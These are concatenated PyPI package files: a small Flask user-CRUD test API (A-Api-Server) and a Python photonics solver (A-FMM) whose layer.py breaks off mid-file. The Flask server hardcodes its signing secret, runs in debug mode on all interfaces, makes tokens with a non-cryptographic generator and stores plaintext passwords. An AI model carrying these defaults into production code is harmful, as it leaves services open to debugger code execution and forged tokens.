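             json={'name': 'admin', 'password': '654321'})               # update
print(requests.get(base + '/api/users', headers=auth_headers).json())    # list
requests.delete(base + '/api/users/1', headers=auth_headers)             # delete
```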
## 3. Automated release: tag and upload to PyPI in one step
After updating the version number in `__about__.py`, run the following command to automatically package the project and upload it to [PYPI](https://pypi.org/); a Git tag matching the version number is created and pushed to the repository at the same time:
```
python3 setup.py pypi
```
Note: before uploading, configure your PyPI account credentials in the twine tool!
## 4. CHANGELOG
```
v1.0.0
1. Implemented the API service for user-account CRUD, including the request-signature verification mechanism;
2. Completed the API usage documentation;
3. Added the automated packaging script;
```
## 5. Acknowledgements
The creation and packaging of the **A-Api-Server** tool drew heavily on the open-source project [HttpRunner](https://github.com/httprunner/httprunner), from which it benefited a great deal. Thanks!
## LICENSE
```
MIT License
Copyright (c) 2019 Devin https://zhangchuzhao.site
Copyright (c) 2017 Toby Qin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```
| A-Api-Server | /A_Api_Server-1.1.7.tar.gz/A_Api_Server-1.1.7/README.md | README.md |
import random
import hashlib
import string
import hmac
import json
import sys
from functools import wraps
from flask import Flask, make_response, request
FLASK_APP_HOST = '0.0.0.0'
FLASK_APP_PORT = 5000
DEBUG = True
SECRET_KEY = "YouMi"
app = Flask(__name__)
""" storage all users' data
data structure:
users_dict = {
'uid1': {
'name': 'name1',
'password': 'pwd1'
},
'uid2': {
'name': 'name2',
'password': 'pwd2'
}
}
"""
users_dict = {}
""" storage all token data
data structure:
token_dict = {
'device_sn1': 'token1',
'device_sn2': 'token2'
}
"""
token_dict = {}
def gen_random_string(str_len):
random_char_list = []
for _ in range(str_len):
random_char = random.choice(string.ascii_letters + string.digits)
random_char_list.append(random_char)
random_string = ''.join(random_char_list)
return random_string
def get_sign(*args):
content = ''.join(args).encode('ascii')
sign_key = SECRET_KEY.encode('ascii')
sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
return sign
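# Example (sketch): computing the signature for the token request, using
# hypothetical header values:
#   get_sign('python-requests', 'TESTDEVICE01', 'ios', '2.8.6')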
def gen_md5(*args):
return hashlib.md5("".join(args).encode('utf-8')).hexdigest()
def validate_request(func):
@wraps(func)
def wrapper(*args, **kwargs):
device_sn = request.headers.get('device_sn', "")
token = request.headers.get('token', "")
if not device_sn or not token:
result = {
'success': False,
'msg': "device_sn or token is null."
}
response = make_response(json.dumps(result), 401)
response.headers["Content-Type"] = "application/json"
return response
        if token_dict.get(device_sn) != token:  # .get avoids a KeyError for unregistered devices
result = {
'success': False,
'msg': "Authorization failed!"
}
response = make_response(json.dumps(result), 403)
response.headers["Content-Type"] = "application/json"
return response
return func(*args, **kwargs)
return wrapper
@app.route('/')
def index():
# return "Hello, this is self-help api service, welcome to use!"
return """
<div style="text-align: center;">
<h1>A Api Server</h1>
<p><a href="https://github.com/zhuifengshen/a-api-server">A Api Server</a>,是一个 Resful 风格的简易 API 服务,提供了对用户账号进行增删改查(CRUD)功能的接口服务,包含了接口的签名校验机制,方便 API 自动化测试工具的开发与调试!</p>
</div>
"""
@app.route('/api/get-token', methods=['POST'])
def get_token():
user_agent = request.headers.get('User-Agent', "")
device_sn = request.headers.get('device_sn', "")
os_platform = request.headers.get('os_platform', "")
app_version = request.headers.get('app_version', "")
data = request.get_json()
sign = data.get('sign', "")
expected_sign = get_sign(user_agent, device_sn, os_platform, app_version)
if expected_sign != sign or not user_agent or not device_sn or not os_platform or not app_version:
result = {
'success': False,
'msg': "Authorization failed!"
}
response = make_response(json.dumps(result), 403)
else:
token = gen_random_string(16)
token_dict[device_sn] = token
result = {
'success': True,
'token': token
}
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users')
@validate_request
def get_users():
users_list = [user for uid, user in users_dict.items()]
users = {
'success': True,
'count': len(users_list),
'items': users_list
}
response = make_response(json.dumps(users))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/reset-all')
@validate_request
def clear_users():
users_dict.clear()
result = {
'success': True
}
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['POST'])
@validate_request
def create_user(uid):
user = request.get_json()
if uid not in users_dict:
result = {
'success': True,
'msg': "user created successfully."
}
status_code = 201
users_dict[uid] = user
else:
result = {
'success': False,
'msg': "user already existed."
}
status_code = 422
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>')
@validate_request
def get_user(uid):
user = users_dict.get(uid, {})
if user:
result = {
'success': True,
'data': user
}
status_code = 200
else:
result = {
'success': False,
'data': user
}
status_code = 404
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['PUT'])
@validate_request
def update_user(uid):
user = users_dict.get(uid, {})
if user:
user = request.get_json()
success = True
status_code = 200
users_dict[uid] = user
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['DELETE'])
@validate_request
def delete_user(uid):
user = users_dict.pop(uid, {})
if user:
success = True
status_code = 200
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
def cli_main():
if len(sys.argv) > 1:
custom_port = int(sys.argv[1])
else:
custom_port = FLASK_APP_PORT
app.run(host=FLASK_APP_HOST, debug=DEBUG, port=custom_port)
if __name__ == "__main__":
cli_main() | A-Api-Server | /A_Api_Server-1.1.7.tar.gz/A_Api_Server-1.1.7/a_api_server/api_server.py | api_server.py |
[](https://a-fmm.readthedocs.io/en/latest/?badge=latest)
[](https://github.com/psf/black)
[](https://choosealicense.com/licenses/mit/)
# A-FMM
This is a Python implementation of the Aperiodic-Fourier Modal Method, a fully vectorial method for solving Maxwell's equations that combines a Fourier-based mode solver and a scattering-matrix recursion algorithm to model full 3D structures. This approach is well suited to calculating modes, transmission, reflection, scattering and absorption of multi-layered structures. Moreover, support for Bloch modes of periodic structures allows for the simulation of photonic crystals or waveguide Bragg gratings.
## Installation
You can install A_FMM directly from pypi by running:
pip install A_FMM
## Documentation
Full documentation is available on [Read the Docs](https://a-fmm.readthedocs.io)
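## Minimal example
The sketch below shows the typical workflow. How the `Creator` object is configured to describe the cell geometry is not shown here (see the documentation); the `Layer` calls follow the actual API.

    from A_FMM.creator import Creator
    from A_FMM.layer import Layer

    creator = Creator()  # configure the cell geometry here (see the docs)
    layer = Layer(10, 10, creator)  # plane-wave truncation orders Nx = Ny = 10
    layer.mode(k0=0.6)  # solve the eigenmode problem at k0 = a/lambda = 0.6
    print(layer.get_index()[:5])  # five largest effective mode indexes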
| A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/README.md | README.md |
import copy
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from matplotlib.backends.backend_pdf import PdfPages
from scipy import linalg
import A_FMM
import A_FMM.sub_sm as sub
from A_FMM.creator import Creator
from A_FMM.scattering import S_matrix
class Layer:
"""Class for the definition of a single layer"""
def __init__(self, Nx: int, Ny: int, creator: Creator, Nyx: float = 1.0):
"""Creator
Args:
Nx (int): truncation order in x direction
Ny (int): truncation order in y direction
Nyx (float): ratio between the cell's dimension in y and x (ay/ax)
"""
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.G_inv = {v: k for k, v in self.G.items()}
self.D = len(self.G)
self.creator = copy.deepcopy(creator)
self.Nyx = Nyx
self.FOUP = self.__create_eps()
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
self.TX = False
self.TY = False
    def __create_eps(self):
        """Builds the Fourier-transform matrix of epsilon over the reciprocal lattice"""
nx = 2 * self.Nx
ny = 2 * self.Ny
mx = 4 * self.Nx + 1
my = 4 * self.Ny + 1
fourier_transform = np.zeros((mx, my), dtype=complex)
x_list = self.creator.x_list
y_list = self.creator.y_list
eps_lists = self.creator.eps_lists
G = self.G
for i in range(mx):
for j in range(my):
fourier_transform[i, j] = sub.fou(
(i + nx) % mx - nx, (j + ny) % my - ny, x_list, y_list, eps_lists
)
D = len(G)
F = np.zeros((D, D), complex)
for i, (gx1, gy1) in G.items():
for j, (gx2, gy2) in G.items():
F[i, j] = fourier_transform[gx1 - gx2, gy1 - gy2]
return F
def inspect(self, st=""):
"""Function for inspectig the attributes of a layer object
Args:
st (string): string to print before the inspection for identification
"""
att = sub.get_user_attributes(self)
print(st)
print(22 * "_")
print("| INT argument")
for i in att:
if type(i[1]) is int:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Float argument")
for i in att:
if type(i[1]) is float:
print("|%10s%10s" % (i[0], str(i[1])))
for i in att:
if type(i[1]) is np.float64:
print("|%10s%10s" % (i[0], str(i[1])))
print("| BOOL argument")
for i in att:
if type(i[1]) is bool:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Array argument")
for i in att:
if type(i[1]) is np.ndarray:
print("|%10s%10s" % (i[0], str(np.shape(i[1]))))
print("")
def eps_plot(self, pdf=None, N=200, s=1):
"""Function for plotting the dielectric consstat rebuit from plane wave expansion
Args:
pdf (string or PdfPages): file for printing the the epsilon
if a PdfPages object, the page is appended to the pdf
if string, a pdf with that name is created
N (int): number of points
s (float): number of cell replicas to display (default 1)
"""
[X, Y] = np.meshgrid(
np.linspace(-s * 0.5, s * 0.5, s * N),
np.linspace(-s * 0.5, s * 0.5, int(s * N * self.Nyx)),
)
EPS = np.zeros((N, N), complex)
# for i in range(self.D):
# EPS+=sub.fou(self.G[i][0],self.G[i][1],self.creator.x_list,self.creator.y_list,self.creator.eps_lists)*np.exp(-(0+2j)*np.pi*(self.G[i][0]*X+self.G[i][1]*Y))
EPS = sum(
[
sub.fou(
self.G[i][0],
self.G[i][1],
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
* np.exp((0 + 2j) * np.pi * (self.G[i][0] * X + self.G[i][1] * Y))
for i in range(self.D)
]
)
plt.figure()
# plt.imshow(np.real(EPS),aspect='auto',extent=[-s*0.5,s*0.5,-self.Nyx*s*0.5,self.Nyx*s*0.5])
plt.imshow(
np.real(EPS),
extent=[-s * 0.5, s * 0.5, -self.Nyx * s * 0.5, self.Nyx * s * 0.5],
origin="lower",
)
plt.colorbar()
if pdf == None:
plt.show()
elif isinstance(pdf, PdfPages):
pdf.savefig()
else:
a = PdfPages(pdf + ".pdf")
a.savefig()
a.close()
plt.close()
def transform(self, ex: float = 0, ey: float = 0, complex_transform: bool = False):
"""Function for adding the real coordinate transfomr to the layer
Note: for no mapping, set the width to 0
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0 (no mapping)
ey (float): relative width of the unmapped region in y direction. Default is 0 (no mapping)
complex_transform (bool): False for real transform (default), True for complex one.
"""
if complex_transform:
transform_function = sub.fou_complex_t
else:
transform_function = sub.fou_t
if ex != 0.0:
self.TX = True
self.ex = ex
self.FX = np.zeros((self.D, self.D), complex)
nx = 2 * self.Nx
mx = 4 * self.Nx + 1
F = [transform_function((i + nx) % mx - nx, ex) for i in range(mx)]
for i, (gx1, gy1) in self.G.items():
for j, (gx2, gy2) in self.G.items():
if gy1 != gy2:
continue
self.FX[i, j] = F[gx1 - gx2]
else:
self.FX = None
if ey != 0.0:
self.TY = True
self.ey = ey
self.FY = np.zeros((self.D, self.D), complex)
ny = 2 * self.Ny
my = 4 * self.Ny + 1
F = [transform_function((i + ny) % my - ny, ey) for i in range(my)]
for i, (gx1, gy1) in self.G.items():
for j, (gx2, gy2) in self.G.items():
if gx1 != gx2:
continue
self.FY[i, j] = F[gy1 - gy2]
else:
self.FY = None
return self.FX, self.FY
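    # Example (sketch): keep 70% of the cell in x unmapped and map the
    # remaining 30% towards infinity with the real transform:
    #   layer.transform(ex=0.7)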
def add_transform_matrix(
self,
ex: float = 0.0,
FX: np.ndarray = None,
ey: float = 0.0,
FY: np.ndarray = None,
):
"""Function for adding matrix of a coordinate transform
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0. This is only for keeping track of the value, as it has no effect on the transformation.
FX (ndarray): FX matrix of the coordinate trasnformation
ey (float): relative width of the unmapped region in y direction. Default is 0. This is only for keeping track of the value, as it has no effect on the transformation.
FY (ndarray): FY matrix of the coordinate trasnformation
"""
if ex != 0:
self.TX = True
self.ex = ex
self.FX = FX
else:
self.FX = None
if ey != 0:
self.TY = True
self.ey = ey
self.FY = FY
else:
self.FY = None
def mode(self, k0: float, kx: float = 0.0, ky: float = 0.0):
"""Calculates the eighenmode of the layer
Args:
k0 (float): Vacuum wavevector
kx (float): Wavevector in the x direction
ky (float): Wavevector in the y direction
"""
self.k0 = k0
self.kx = kx
self.ky = ky
(k1, k2) = sub.createK(self.G, k0, kx=kx, ky=ky, Nyx=self.Nyx)
if self.TX:
k1 = np.dot(self.FX, k1)
if self.TY:
k2 = np.dot(self.FY, k2)
self.GH, self.M = sub.create_2order_new(
self.D, k1, k2, self.INV, self.EPS1, self.EPS2
)
[self.W, self.V] = linalg.eig(self.M)
self.gamma = np.sqrt(self.W) * np.sign(np.angle(self.W) + 0.5 * np.pi)
if np.any(np.real(self.gamma) + np.imag(self.gamma) <= 0.0):
print("Warining: wrong complex root")
if np.any(np.abs(self.gamma) <= 0.0):
print("Warining: gamma=0")
self.VH = np.dot(self.GH, self.V / self.gamma)
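    # Example (sketch): after building a layer, solve for its modes and
    # inspect the dominant effective indexes:
    #   layer.mode(k0=0.6)
    #   print(layer.get_index()[:2])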
def clear(self):
"""Removes data created in mode method"""
self.VH = None
self.M = None
self.GH = None
self.W = None
self.V = None
self.gamma = None
def get_index(self, ordered: bool = True) -> np.ndarray:
"""Returns the effective idexes of the modes
Args:
ordered (bool): if True (default) the modes are ordered by decreasing effective index
"""
if ordered:
Neff = self.gamma[np.argsort(self.W)[::-1]]
else:
Neff = self.gamma
return Neff
def mat_plot(self, name: str):
"""Plot the absolute values of the fourier trasnsform matrices
Args:
name (str): name of the pdf file for plotting
N (int): number of points for plotting the epsilon
s (float): number pf relicas of the cell to plot. Default is 1.
"""
with PdfPages(name + ".pdf") as save:
for attr in ["FOUP", "EPS1", "EPS2", "INV", "FX", "FY"]:
try:
to_plot = getattr(self, attr)
plt.figure()
plt.title(attr)
plt.imshow(np.abs(to_plot), aspect="auto", interpolation="nearest")
plt.colorbar()
save.savefig()
plt.close()
except AttributeError:
pass
def plot_Ham(self, pdf: PdfPages) -> None:
"""Plot the matrix of the eigenvalue problem
Args:
pdf (PdfPages): pdf object to be used to plot.
Returns:
None.
"""
plt.figure()
plt.title("k0:%5.3f kx:%5.3f ky:%5.3f" % (self.k0, self.kx, self.ky))
plt.imshow(np.abs(np.abs(self.M)), aspect="auto", interpolation="nearest")
plt.colorbar()
pdf.savefig()
plt.close()
def _process_xy(self, x: np.ndarray, y: np.ndarray) -> tuple:
"""Transform the x and y coordinates between the real and computational space
Args:
x (ndarray): array of x coordinates in the real space
y (ndarray): array of y coordinates in the real space
Returns: tuple of numpy.ndarray containing:
- ndarray: array of x coordinates in the computational space
- ndarray: array of y coordinates in the computational space
"""
if self.TX:
x = sub.t_inv(x, self.ex)
if self.TY:
y = sub.t_inv(y, self.ey)
return x, y
def calculate_epsilon(
self, x: np.ndarray = 0.0, y: np.ndarray = 0.0, z: np.ndarray = 0.0
) -> dict[str, np.ndarray]:
"""Return epsilon given the coordinates
The epsilon returned here is the one reconstructed from the Fourier transform.
The epsilon is reconstructed on the meshgrid of x,y, and z.
Args:
x (array_like): x coordinates (1D array).
y (array_like): y coordinates (1D array).
z (array_like): z coordinates (1D array).
Returns:
            dict of ndarray: 'x', 'y', 'z' coordinate meshgrids and the reconstructed 'eps' values.
Raises:
ValueError:
if x,y,z have different shapes
"""
x, y = self._process_xy(x, y)
eps = self.FOUP[:, self.D // 2]
gx, gy = zip(*[g for i, g in self.G.items()])
gx, gy = np.asarray(gx), np.asarray(gy)
xp, yp, gxp = np.meshgrid(x, y, gx, indexing="ij")
xp, yp, gyp = np.meshgrid(x, y, gy, indexing="ij")
eps_p = np.dot(np.exp((0 + 2j) * np.pi * (gxp * xp + gyp * yp)), eps)
shape = np.shape(eps_p)
EPS, _ = np.meshgrid(eps_p, z, indexing="ij")
EPS = EPS.reshape(*shape, -1)
x, y, z = np.meshgrid(x, y, z, indexing="ij")
eps = {
"x": x,
"y": y,
"z": z,
"eps": EPS,
}
return eps
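    # Example (sketch, assumed values): reconstructing epsilon of a solved
    # layer on a transverse grid at z = 0; 'lay' is a Layer built as above.
    #
    #   x = np.linspace(-0.5, 0.5, 101)
    #   out = lay.calculate_epsilon(x=x, y=x, z=[0.0])
    #   plt.contourf(out['x'][:, :, 0], out['y'][:, :, 0],
    #                out['eps'][:, :, 0].real, levels=41)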
@staticmethod
def _filter_componets(components: list = None) -> list:
"""
        Checks that the list of field components contains only allowed ones
"""
if components is None:
return ["Ex", "Ey", "Hx", "Hy"]
for comp in components:
if comp not in ["Ex", "Ey", "Hx", "Hy"]:
raise ValueError(
f"Field component f{comp} not available. Only Ex, Ey, Hx, or Hy are allowed"
)
return components
@staticmethod
def _check_array_shapes(u: np.ndarray, d: np.ndarray) -> None:
"""
        Checks that the modal amplitude arrays and the coordinate arrays have consistent shapes
"""
if np.shape(u) != np.shape(d):
raise ValueError(
f"Shape of u different from shape of d {np.shape(u)}!={np.shape(d)}"
)
def calculate_field_old(
self,
u: np.ndarray,
d: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list = None,
) -> dict:
"""Return field given modal coefficient and coordinates
Coordinates arrays must be 1D. Fields are returned on a meshgrid of the input coordinates.
Older version. Slower, but may require less memory.
Args:
u (array_like): coefficient of forward propagating modes.
d (array_like, optional): coefficient of backward propagating modes.
Default to None: no backward propagation is assumed.
x (array_like): x coordinates.
y (array_like): y coordinates.
z (array_like): z coordinates.
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
dict of ndarray : Desired field components. Shape of ndarray is the same as x,y, and z.
Raises:
ValueError:
if other component than 'Ex', 'Ey', 'Hx', or 'Hy' is requested.
"""
components = self._filter_componets(components)
d = np.zeros_like(u, dtype=complex) if d is None else d
self._check_array_shapes(u, d)
x, y = self._process_xy(x, y)
x, y, z = np.meshgrid(x, y, z, indexing="ij")
field = {
"x": x,
"y": y,
"z": z,
}
field.update({comp: np.zeros_like(x, dtype=complex) for comp in components})
for i, (uu, dd, n) in enumerate(zip(u, d, self.gamma)):
if uu == 0.0 and dd == 0.0:
continue
field_tmp = {comp: np.zeros_like(x, dtype=complex) for comp in components}
for j, (gx, gy) in self.G.items():
[WEx, WEy] = np.split(self.V[:, i], 2)
[WHx, WHy] = np.split(self.VH[:, i], 2)
EXP = np.exp(
(0 + 2j) * np.pi * ((gx + self.kx) * x + (gy + self.ky) * y)
)
for comp in components:
sign = 1.0 if comp[0] == "E" else -1.0
coeff = uu * np.exp(
2.0j * np.pi * self.k0 * n * z
) + sign * dd * np.exp(-2.0j * np.pi * self.k0 * n * z)
field_tmp[comp] = (
field_tmp[comp] + coeff * eval(f"W{comp}")[j] * EXP
)
for comp in components:
field[comp] = field[comp] + field_tmp[comp]
return field
def calculate_field(
self,
u: np.ndarray,
d: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list = None,
) -> dict:
"""Return field given modal coefficient and coordinates
Coordinates arrays must be 1D. Fields are returned on a meshgrid of the input coordinates.
Args:
u (array_like): coefficient of forward propagating modes.
d (array_like, optional): coefficient of backward propagating modes.
Default to None: no backward propagation is assumed.
x (array_like): x coordinates.
y (array_like): y coordinates.
z (array_like): z coordinates.
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
dict of ndarray : Desired field components. Shape of ndarray is the same as x,y, and z.
Raises:
ValueError:
if other component than 'Ex', 'Ey', 'Hx', or 'Hy' is requested.
"""
x, y = self._process_xy(x, y)
components = self._filter_componets(components)
d = np.zeros_like(u, dtype=complex) if d is None else d
self._check_array_shapes(u, d)
X, Y, Z = np.meshgrid(x, y, z, indexing="ij")
field = {
"x": X,
"y": Y,
"z": Z,
}
Gx = [gs[0] for (i, gs) in self.G.items()]
Gy = [gs[1] for (i, gs) in self.G.items()]
u, d = np.asarray(u), np.asarray(d)
ind = [i for i, (uu, dd) in enumerate(zip(u, d)) if uu != 0.0 or dd != 0.0]
u = u[ind]
d = d[ind]
WEx, WEy = np.split(self.V, 2, axis=0)
WHx, WHy = np.split(self.VH, 2, axis=0)
W = {
"Ex": WEx[:, ind],
"Ey": WEy[:, ind],
"Hx": WHx[:, ind],
"Hy": WHy[:, ind],
}
X, Y, Gx = np.meshgrid(x, y, Gx, indexing="ij")
X, Y, Gy = np.meshgrid(x, y, Gy, indexing="ij")
EXP = np.exp(2.0j * np.pi * ((Gx + self.kx) * X + (Gy + self.ky) * Y))
u, Z = np.meshgrid(u, z, indexing="ij")
d, Z = np.meshgrid(d, z, indexing="ij")
n, Z = np.meshgrid(self.gamma[ind], z, indexing="ij")
z_exp = 2.0j * np.pi * self.k0 * n * Z
coeff_u = u * np.exp(z_exp)
coeff_d = d * np.exp(-z_exp)
for comp in components:
coeff = coeff_u + coeff_d if "E" in comp else coeff_u - coeff_d
EXPV = np.dot(EXP, W[comp])
field[comp] = np.dot(EXPV, coeff)
return field
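    # Example (sketch, assumed values): exciting the fundamental mode of a
    # solved layer and sampling Ex on a transverse grid at z = 0.
    #
    #   u = lay.create_input({0: 1.0})   # unit amplitude on the first mode
    #   x = np.linspace(-0.5, 0.5, 101)
    #   out = lay.calculate_field(u, x=x, y=x, z=[0.0], components=['Ex'])
    #   Ex = out['Ex'][:, :, 0]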
def get_modal_field(
self, i: int, x: float = 0.0, y: float = 0.0, components: list = None
) -> dict:
"""Returns modal field profile
Args:
i (int): index of the mode.
x (float or array_like): x coordinate for the field calculation
y (float or array_like): y coordinate for the field calculation
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
            dict: modal field components and coordinates
"""
        u = self.create_input({i: 1.0})
        # calculate_field expects the modal coefficients first and the 1D
        # coordinates as keyword arguments (the previous call passed them in
        # the wrong order)
        field = self.calculate_field(u, x=x, y=y, z=[0.0], components=components)
        data = {k: np.squeeze(v) for k, v in field.items()}
        return data
def get_P_norm(self):
"""Creates array of single mode Poynting vector components.
It is stored in the P_norm attribute
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
[VHx, VHy] = np.split(self.VH, 2)
self.P_norm = np.sum(VEx * np.conj(VHy) - VEy * np.conj(VHx), 0).real
def get_Poynting_single(self, i: int, u: np.ndarray, ordered: bool = True) -> float:
"""Return the Poyinting vector of a single mode given the modal expansion in the layer
Args:
i (int): Index of the mode.
u (1darray): Array of modal coefficient.
ordered (TYPE, optional): Regulates how mode are ordered. If True, they are ordered for decreasing effective index. If Flase, the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
TYPE: DESCRIPTION.
"""
if ordered:
j = np.argsort(self.W)[-i - 1]
else:
j = i
self.get_Poyinting_norm()
return self.PP_norm[j, j].real * np.abs(u[j]) ** 2.0
def get_Poyinting_norm(self):
"""Calculates the normalization matrix for the Poyinting vector calculations
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
[VHx, VHy] = np.conj(np.split(self.VH, 2))
# old version (working)
# self.PP_norm=np.zeros((2*self.D,2*self.D),dtype=complex)
# for i in range(self.D):
# VEX,VHY=np.meshgrid(VEx[i,:],VHy[i,:])
# VEY,VHX=np.meshgrid(VEy[i,:],VHx[i,:])
# P1=np.multiply(VEX,VHY)
# P2=-np.multiply(VEY,VHX)
# P=np.add(P1,P2)
# self.PP_norm=np.add(self.PP_norm,P)
# print self.PP_norm
        # new version, should be equivalent but faster
P1 = np.dot(np.transpose(VEx), VHy)
P2 = np.dot(np.transpose(VEy), VHx)
self.PP_norm = np.add(P1, -P2)
def get_Poynting(self, u: np.ndarray, d: np.ndarray = None):
"""Calculates total Poynting vector in the layer given arrays of modal expansion
Args:
u (1darray): Modal expansion of forward propagating modes.
d (1darray, optional): Modal expansion of backward propagating modes. Defaults to None.
        Returns:
            float: Total Poynting vector in the layer (real part).
"""
if d is None:
d = np.zeros(2 * self.D, dtype=complex)
# try:
# self.PP_norm
# except AttributeError:
# self.get_Poyinting_norm()
self.get_Poyinting_norm()
Cn = np.add(u, d)
Cnp = np.add(u, -d)
[Cn, Cnp] = np.meshgrid(Cn, np.conj(Cnp))
C = np.multiply(Cn, Cnp)
PP = np.multiply(C, self.PP_norm)
return np.sum(PP).real
def T_interface(self, lay) -> np.ndarray:
"""Builds the Transfer matrix of the interface with another layer
Args:
lay (Layer): Layer toward which to calculate the scattering matrix.
Returns:
            T (2darray): Interface transfer matrix.
"""
T1 = np.dot(linalg.inv(lay.V), self.V)
T2 = np.dot(linalg.inv(lay.VH), self.VH)
T11 = 0.5 * (T1 + T2)
T12 = 0.5 * (T1 - T2)
T21 = 0.5 * (T1 - T2)
T22 = 0.5 * (T1 + T2)
T = np.vstack([np.hstack([T11, T12]), np.hstack([T21, T22])])
return T
def T_prop(self, d: float) -> np.ndarray:
"""Build the propagation Transfer matrix of the layer
Args:
d (float): Thickness of the layer.
Returns:
T (2darray): Propagation Transfer matrix.
"""
I1 = np.diag(np.exp((0 + 1j) * self.k0 * self.gamma * d))
I2 = np.diag(np.exp(-(0 + 1j) * self.k0 * self.gamma * d))
I = np.zeros((2 * self.D, 2 * self.D), complex)
T = np.vstack([np.hstack([I1, I]), np.hstack([I, I2])])
return T
# newer version, should be faster
def interface(self, lay) -> S_matrix:
"""Builds the Scattering matrix of the interface with another layer
Args:
lay (Layer): Layer toward which to calculate the scattering matrix.
Returns:
S (S_matrix): Interface scattering matrix.
"""
S = S_matrix(2 * self.D)
T1 = np.dot(linalg.inv(lay.V), self.V)
T2 = np.dot(linalg.inv(lay.VH), self.VH)
T11 = 0.5 * (T1 + T2)
T12 = 0.5 * (T1 - T2)
# T21= 0.5*(T1 - T2)
# T22= 0.5*(T1 + T2)
# T=np.vstack([np.hstack([T11,T12]),np.hstack([T21,T22])])
Tm = linalg.inv(T11)
S.S11 = T11 - np.dot(np.dot(T12, Tm), T12)
S.S12 = np.dot(T12, Tm)
S.S21 = -np.dot(Tm, T12)
S.S22 = Tm
return S
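    # Example (sketch): interface scattering matrix between two layers solved
    # at the same k0, kx, ky; the result is an S_matrix with blocks S11..S22.
    #
    #   lay1.mode(k0); lay2.mode(k0)
    #   S = lay1.interface(lay2)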
def get_input(
self,
func: callable,
args: tuple = None,
Nxp: int = 1024,
Nyp: int = None,
fileprint: str = None,
) -> np.ndarray:
"""Expands an arbitrary fieldd shape on the basis of the layer eigenmodes
Args:
func (function): Function describing the field.
This function should be in the form (x,y,*args). It must be able to accept x and y as numpy array.
It must return two values, expressing Ex and Ey
args (tuple, optional): Eventual tuple of additional arguments for func. Defaults to None.
Nxp (int, optional): Number of points to evaluate the function in the x direction. Defaults to 1024.
Nyp (int, optional): Number of points to evaluate the function in the y direction. Defaults to None (1 if layer is 1D, Nxp if 2D).
fileprint (str, optional): Filename on which to write the used function. Mainly for debug. Defaults to None.
Returns:
u (1darray): Array of the modal coefficient of the expansion.
"""
args = () if args is None else args
        if Nyp is None:
if self.Ny == 0:
Nyp = 1
y = np.array([0.0])
else:
Nyp = Nxp
y = np.linspace(-0.5, 0.5, Nyp)
else:
y = np.linspace(-0.5, 0.5, Nyp)
x = np.linspace(-0.5, 0.5, Nxp)
if self.TX:
ex = self.ex
x = sub.t_dir(x, ex)
if self.TY:
ey = self.ey
y = sub.t_dir(y, ey)
y = y * self.Nyx
[X, Y] = np.meshgrid(x, y, indexing="ij")
[Fx, Fy] = func(X, Y, *args)
Fx = np.fft.fftshift(Fx) / (Nxp * Nyp)
Fy = np.fft.fftshift(Fy) / (Nxp * Nyp)
FOUx = np.fft.fft2(Fx)
FOUy = np.fft.fft2(Fy)
Estar = np.zeros(2 * self.NPW, dtype=complex)
for i in range(self.NPW):
# print self.G[i][0], self.G[i][1],FOUx[self.G[i][0],self.G[i][1]]
Estar[i] = FOUx[self.G[i][0], self.G[i][1]]
Estar[i + self.NPW] = FOUy[self.G[i][0], self.G[i][1]]
u = linalg.solve(self.V, Estar)
return u
def create_input(self, dic: dict) -> np.ndarray:
